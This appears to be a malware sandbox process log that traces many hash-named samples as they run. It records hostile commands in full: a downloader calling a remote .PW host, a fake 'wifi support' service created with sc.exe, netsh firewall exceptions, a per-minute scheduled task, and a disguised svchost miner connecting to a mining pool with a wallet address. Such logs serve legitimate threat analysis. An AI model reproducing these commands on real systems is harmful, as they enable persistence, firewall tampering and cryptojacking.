C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessA"
5⤵
PID:6192

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessA".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:6360

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingA"
5⤵
PID:6460

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingA".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:6728

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\118392.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\118392.exe
5⤵
PID:5760

C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\explorer.exe
5⤵
PID:3504

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe" "http://www.winfreycmh.PW/ee/12337506?4192289f4192289=1689838620009923700=ajmhcxtfajmhcxtfajmhcxtf4" "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\905"
4⤵
PID:4644

C:\Users\Admin\Desktop\2022-10-24\0edd5342b1fc252b5164f41118b0b0e69d954772a4ec6ee14f49d15fa4ddf66d.exe
"C:\Users\Admin\Desktop\2022-10-24\0edd5342b1fc252b5164f41118b0b0e69d954772a4ec6ee14f49d15fa4ddf66d.exe"
2⤵
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1724
3⤵
- Program crash
PID:4892

C:\Users\Admin\Desktop\2022-10-24\0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe
"C:\Users\Admin\Desktop\2022-10-24\0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe"
2⤵
PID:5100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yszjavnl\
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:184

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hkteeaax.exe" C:\Windows\SysWOW64\yszjavnl\
3⤵
PID:2320

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create yszjavnl binPath= "C:\Windows\SysWOW64\yszjavnl\hkteeaax.exe /d\"C:\Users\Admin\Desktop\2022-10-24\0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe\"" type= own start= auto DisplayName= "wifi support"
3⤵
- Launches sc.exe
PID:2800

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description yszjavnl "wifi internet conection"
3⤵
- Launches sc.exe
PID:2096

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start yszjavnl
3⤵
- Launches sc.exe
PID:2572

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
3⤵
- Modifies Windows Firewall
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 784
3⤵
- Executes dropped EXE
- Program crash
- Modifies data under HKEY_USERS
PID:2244

C:\Users\Admin\Desktop\2022-10-24\1c1b31ad0a3391ee125f6072e76ec6a5c6305fdc5ca740bcac1ae2a3be767a22.exe
"C:\Users\Admin\Desktop\2022-10-24\1c1b31ad0a3391ee125f6072e76ec6a5c6305fdc5ca740bcac1ae2a3be767a22.exe"
2⤵
PID:5020

C:\Users\Admin\Desktop\2022-10-24\1c1b31ad0a3391ee125f6072e76ec6a5c6305fdc5ca740bcac1ae2a3be767a22.exe
"C:\Users\Admin\Desktop\2022-10-24\1c1b31ad0a3391ee125f6072e76ec6a5c6305fdc5ca740bcac1ae2a3be767a22.exe"
3⤵
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 220
4⤵
- Program crash
PID:4544

C:\Users\Admin\Desktop\2022-10-24\1f8079a460be76dad49a59bce35a7620f3372bddc03e73cb8003439c87bf8566.exe
"C:\Users\Admin\Desktop\2022-10-24\1f8079a460be76dad49a59bce35a7620f3372bddc03e73cb8003439c87bf8566.exe"
2⤵
- Executes dropped EXE
PID:1588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe"
3⤵
PID:968

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
4⤵
PID:4324

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4092

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\sefanathread"
3⤵
PID:1252

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\Desktop\2022-10-24\1f8079a460be76dad49a59bce35a7620f3372bddc03e73cb8003439c87bf8566.exe" "C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe"
3⤵
PID:4556

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe'" /f
3⤵
- Executes dropped EXE
PID:2528

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe'" /f
4⤵
- Creates scheduled task(s)
PID:3008

C:\Users\Admin\Desktop\2022-10-24\3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exe
"C:\Users\Admin\Desktop\2022-10-24\3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exe"
2⤵
- Executes dropped EXE
PID:464

C:\Users\Admin\Desktop\2022-10-24\3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exe
"C:\Users\Admin\Desktop\2022-10-24\3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exe"
3⤵
PID:5032

C:\Users\Admin\Desktop\2022-10-24\3dcb748a731af578daa96d6c5c023771adb0902c08d090a9ed41227eb8e9d8e8.exe
"C:\Users\Admin\Desktop\2022-10-24\3dcb748a731af578daa96d6c5c023771adb0902c08d090a9ed41227eb8e9d8e8.exe"
2⤵
PID:3688

C:\Users\Admin\Desktop\2022-10-24\4d51baa13ce9b91eff034899556ba11e23660dd24e3652902c7d7cc2db063b50.exe
"C:\Users\Admin\Desktop\2022-10-24\4d51baa13ce9b91eff034899556ba11e23660dd24e3652902c7d7cc2db063b50.exe"
2⤵
PID:4112

C:\Users\Admin\AppData\Local\Temp\is-62O9B.tmp\is-BCHK6.tmp
"C:\Users\Admin\AppData\Local\Temp\is-62O9B.tmp\is-BCHK6.tmp" /SL4 $120368 "C:\Users\Admin\Desktop\2022-10-24\4d51baa13ce9b91eff034899556ba11e23660dd24e3652902c7d7cc2db063b50.exe" 2323851 52736
3⤵
PID:4452

C:\Program Files (x86)\etSearcher\etsearcher58.exe
"C:\Program Files (x86)\etSearcher\etsearcher58.exe"
4⤵
PID:4672

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2022-10-24\4d55c5d9ddf1974f62bbf88a693348bc81ceb8a2b7348b8f71c94455497f90de.js"
2⤵
PID:4540

C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\qStjrLzNjq.js"
3⤵
PID:2544

C:\Users\Admin\Desktop\2022-10-24\5bfc5adc36e614220e723f03a499372a525bccb1719f621b6edc52d2d2737e32.exe
"C:\Users\Admin\Desktop\2022-10-24\5bfc5adc36e614220e723f03a499372a525bccb1719f621b6edc52d2d2737e32.exe"
2⤵
PID:1412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 1720
3⤵
- Program crash
PID:3604

C:\Users\Admin\Desktop\2022-10-24\5d954998ba8c1086f196cf2572f0690b97c5fba623d0ca057cea74dd77aae5e0.exe
"C:\Users\Admin\Desktop\2022-10-24\5d954998ba8c1086f196cf2572f0690b97c5fba623d0ca057cea74dd77aae5e0.exe"
2⤵
PID:4832

C:\Users\Admin\AppData\Local\Temp\sphybwtjm.exe
"C:\Users\Admin\AppData\Local\Temp\sphybwtjm.exe"
3⤵
- Executes dropped EXE
PID:5100

C:\Users\Admin\AppData\Local\Temp\sphybwtjm.exe
"C:\Users\Admin\AppData\Local\Temp\sphybwtjm.exe"
4⤵
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 504
4⤵
- Program crash
PID:1264

C:\Users\Admin\Desktop\2022-10-24\6cfd1167777006598f5eb5d1c08e1434aefe606dfd983c683a8f14639d56d053.exe
"C:\Users\Admin\Desktop\2022-10-24\6cfd1167777006598f5eb5d1c08e1434aefe606dfd983c683a8f14639d56d053.exe"
2⤵
PID:1492

C:\Users\Admin\AppData\Local\Temp\einepcpwmu.exe
"C:\Users\Admin\AppData\Local\Temp\einepcpwmu.exe"
3⤵
PID:4596

C:\Users\Admin\AppData\Local\Temp\einepcpwmu.exe
"C:\Users\Admin\AppData\Local\Temp\einepcpwmu.exe"
4⤵
PID:2044

C:\Users\Admin\Desktop\2022-10-24\8ca8aa7e36b75a4a71e801e655791fb4b7d6efb744a8ba66086a5899959e1096.exe
"C:\Users\Admin\Desktop\2022-10-24\8ca8aa7e36b75a4a71e801e655791fb4b7d6efb744a8ba66086a5899959e1096.exe"
2⤵
PID:4024

C:\Users\Admin\Desktop\2022-10-24\8c302ce949eabb0b11c6c066f52a01809a32cc93283fd4d20ea5a10baad5f4eb.exe
"C:\Users\Admin\Desktop\2022-10-24\8c302ce949eabb0b11c6c066f52a01809a32cc93283fd4d20ea5a10baad5f4eb.exe"
2⤵
PID:4032

C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
3⤵
PID:4436

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
4⤵
- Modifies Windows Firewall
PID:2020

C:\Users\Admin\Desktop\2022-10-24\8c302ce949eabb0b11c6c066f52a01809a32cc93283fd4d20ea5a10baad5f4eb.exe
"C:\Users\Admin\Desktop\2022-10-24\8c302ce949eabb0b11c6c066f52a01809a32cc93283fd4d20ea5a10baad5f4eb.exe"
2⤵
PID:2724

C:\Users\Admin\Desktop\2022-10-24\8bd4fc268a7f26a4ff5cad8ff2c97a22b17a2f6cb5b4118f47cad0102d3b155d.exe
"C:\Users\Admin\Desktop\2022-10-24\8bd4fc268a7f26a4ff5cad8ff2c97a22b17a2f6cb5b4118f47cad0102d3b155d.exe"
2⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\aqjowjfig.exe
"C:\Users\Admin\AppData\Local\Temp\aqjowjfig.exe"
3⤵
PID:2252

C:\Users\Admin\AppData\Local\Temp\aqjowjfig.exe
"C:\Users\Admin\AppData\Local\Temp\aqjowjfig.exe"
4⤵
PID:2588

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
2⤵
PID:2320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
2⤵
- Executes dropped EXE
PID:4580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe27fb46f8,0x7ffe27fb4708,0x7ffe27fb4718
3⤵
PID:2252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
3⤵
PID:116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
3⤵
PID:3560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
3⤵
PID:4820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
3⤵
PID:4356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
3⤵
PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
3⤵
PID:5504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
3⤵
PID:5496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
3⤵
PID:6004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
3⤵
PID:5996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
3⤵
PID:5440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
3⤵
PID:5764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
3⤵
PID:3408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5360 /prefetch:8
3⤵
PID:5400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4592 /prefetch:8
3⤵
PID:5704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
3⤵
PID:4332

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
3⤵
PID:412

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
3⤵
PID:5848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
3⤵
PID:7064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
3⤵
PID:6864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
3⤵
PID:5308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
3⤵
PID:6596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
3⤵
PID:5156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
3⤵
PID:6200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1
3⤵
PID:408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
3⤵
PID:6176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
3⤵
PID:5604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
3⤵
PID:6788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6608 /prefetch:8
3⤵
PID:6868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7464 /prefetch:8
3⤵
PID:6692

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7644 /prefetch:8
3⤵
PID:6844

C:\Users\Admin\Downloads\MBSetup.exe
"C:\Users\Admin\Downloads\MBSetup.exe"
3⤵
PID:7060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6476 /prefetch:2
3⤵
PID:6884

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3872

C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"
2⤵
PID:7452

C:\Program Files (x86)\Jqbb\ihsdprr8vlrpdx.exe
"C:\Program Files (x86)\Jqbb\ihsdprr8vlrpdx.exe"
2⤵
PID:8568

C:\Program Files (x86)\Jqbb\ihsdprr8vlrpdx.exe
"C:\Program Files (x86)\Jqbb\ihsdprr8vlrpdx.exe"
3⤵
PID:8788

C:\Windows\SysWOW64\systray.exe
"C:\Windows\SysWOW64\systray.exe"
2⤵
PID:9372

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 192 -p 4908 -ip 4908
1⤵
PID:2912

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4908 -s 1508
1⤵
- Program crash
PID:4484

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4088 -ip 4088
1⤵
PID:4956

C:\Windows\SysWOW64\yszjavnl\hkteeaax.exe
C:\Windows\SysWOW64\yszjavnl\hkteeaax.exe /d"C:\Users\Admin\Desktop\2022-10-24\0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe"
1⤵
- Executes dropped EXE
PID:1540

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:1036

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.70000 -p x -k -a cn/half
3⤵
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 528
2⤵
- Program crash
PID:2912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5100 -ip 5100
1⤵
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4580 -ip 4580
1⤵
PID:2328

C:\Windows\system32\wbem\wmiprvse.exe
